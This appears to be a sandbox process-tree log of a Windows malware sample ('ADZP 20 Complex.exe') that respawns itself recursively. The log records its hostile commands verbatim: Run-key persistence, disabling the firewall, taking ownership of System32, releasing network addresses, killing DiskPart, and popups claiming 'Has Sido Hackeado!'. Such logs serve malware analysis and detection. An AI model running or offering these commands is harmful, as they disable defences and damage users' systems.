C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:9296
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:9476
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:9848
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:10396
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:9760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:15308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:15196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5724
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:4340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:7360
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:14752
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:6244
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:7648
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:7172
-
-
C:\Windows\system32\calc.execalc5⤵PID:7064
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6236
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:7432
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F741.tmp\115.tmp\116.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:6080
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll8⤵PID:9452
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B8F.tmp\9B90.tmp\9B91.bat C:\Windows\System32\Twain_20.dll"9⤵PID:9548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd10⤵PID:8132
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll11⤵PID:14460
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2CFD.tmp\2CFE.tmp\2CFF.bat C:\Windows\System32\Twain_20.dll"12⤵PID:14552
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵
- Modifies Windows Firewall
PID:12120
-
-
-
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"8⤵PID:12612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:9812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:9956
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵PID:7060
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:6608
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:7336
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:5876
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:12520
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:13732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:1424
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:13640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9688
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6652
-
-
C:\Windows\system32\calc.execalc5⤵PID:516
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6508
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:5804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:9020
-
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:4908
-
-
C:\Windows\system32\calc.execalc3⤵PID:5080
-
-
C:\Windows\explorer.exeexplorer.exe3⤵PID:3944
-
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵PID:1372
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\55B1.tmp\55B2.tmp\55B3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵PID:348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:3080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵PID:5856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵PID:5972
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
PID:4508
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵PID:4140
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵PID:1568
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:3092
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
PID:5160
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*5⤵
- Views/modifies file attributes
PID:5360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4880
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:6004
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:2056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:6132
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:2020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:4524
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:5628
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:3912
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵PID:5828
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:1648
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B258.tmp\B259.tmp\B25A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6192
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:3392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:3616
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:9072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:8848
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Modifies file permissions
PID:2536
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:5040
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8972
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:2312
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:9916
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:5128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12756
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:8920
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:13504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:3792
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12420
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:9524
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:14044
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:14128
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12312
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\223F.tmp\2240.tmp\2241.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:14184
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:5936
-
-
C:\Windows\system32\calc.execalc7⤵PID:13524
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:2300
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:7004
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:8692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2164.tmp\2165.tmp\2166.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:8232
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:6444
-
-
C:\Windows\system32\calc.execalc7⤵PID:9688
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:7312
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11044
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:9296
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\21F1.tmp\21F2.tmp\21F3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11584
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:5872
-
-
C:\Windows\system32\calc.execalc7⤵PID:220
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:10660
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:1028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12720
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:14496
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:3944
-
-
C:\Windows\system32\calc.execalc5⤵PID:5828
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6152
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6248
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B788.tmp\B789.tmp\B78A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7492
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:7444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:5636
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8464
-
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8496
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8648
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:8908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:7324
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:9064
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:1860
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:6064
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9356
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9444
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9644
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9664
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9896
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10100
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10124
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5732
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:1976
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D443.tmp\D444.tmp\D454.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:10256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13132
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:14196
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9C84.tmp\9C85.tmp\9C86.bat C:\Windows\System32\Twain_20.dll"11⤵PID:11468
-
-
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:15140
-
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:11128
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:8972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:11880
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:10544
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:13264
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:7264
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:9624
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:15076
-
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵PID:7336
-
-
C:\Windows\SysWOW64\calc.execalc7⤵PID:10508
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:10580
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe7⤵PID:10692
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:10840
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EE43.tmp\EE54.tmp\EE55.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13784
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:9296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:8268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:7144
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:9372
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:14900
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:9164
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:15068
-
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵PID:10956
-
-
C:\Windows\SysWOW64\calc.execalc7⤵PID:11148
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:11248
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe7⤵PID:8960
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:7508
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7F5.tmp\7F6.tmp\7F7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:8036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:8048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:10196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:12056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:13148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:12592
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:7600
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:9272
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:6488
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:7852
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:12440
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*9⤵
- Views/modifies file attributes
PID:7124
-
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵PID:7340
-
-
C:\Windows\SysWOW64\calc.execalc7⤵PID:7672
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:7980
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe7⤵PID:10368
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:8888
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10092
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:4404
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:1152
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6456
-
-
C:\Windows\system32\calc.execalc5⤵PID:6628
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6644
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6808
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:7008
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C64D.tmp\C64E.tmp\C64F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:7276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:1376
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:8172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:5708
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8376
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8452
-
-
